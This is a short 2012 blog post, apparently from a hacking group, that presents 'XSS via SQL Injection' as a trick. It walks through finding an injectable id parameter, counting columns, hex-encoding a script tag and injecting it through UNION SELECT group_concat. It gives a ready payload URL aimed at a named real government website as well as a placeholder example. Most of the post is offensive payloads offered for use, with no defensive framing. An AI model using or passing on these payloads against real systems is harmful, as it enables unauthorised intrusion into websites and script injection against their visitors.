Wednesday 3 October 2012

XSS via SQL Injection

AJITH KP October 03, 2012 1 comment :

Hello Guys. You can use SQLi instead of XSS injection. Yes it is a simple trick.

[0x01] You got SQLi vulnerability in website
http://www.vulnerable.com/index.php?id=560

[0x02] Next count the columns. You got 5 columns and column 3 is 
vulnerable.

[0x03] Next encode your JavaScript to HexaDecimal value.
Eg. <script>alert("Ajith 'n Ajmal")</script> 's hexa decimal value is 3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e

[0x04] Insert the hexa decimal value into group_concat function.
That is now use URL 

www.vulnerable.com/index.php?id=560+UNION+SELECT+1,2,group_concat(0xhexadecimalvalue),4,5

 
Eg. http://www.commerce.gov.pk/ptmaview.php?ID=-32+union+select+1,2,3,group_concat%280x3c7363726970743e616c6572742822416a69746820274e20416a6d616c22293c2f7363726970743e%29,5,6,7,8,9,10,11,12,13,14 



[0x05] By Team AJJA[Ajith Kp | Jhelai Sahadevan | Jitendra Singh | Ajmal Joshi]
Hope You Like this trick...

if you share this in your blogs please add my link to this blog...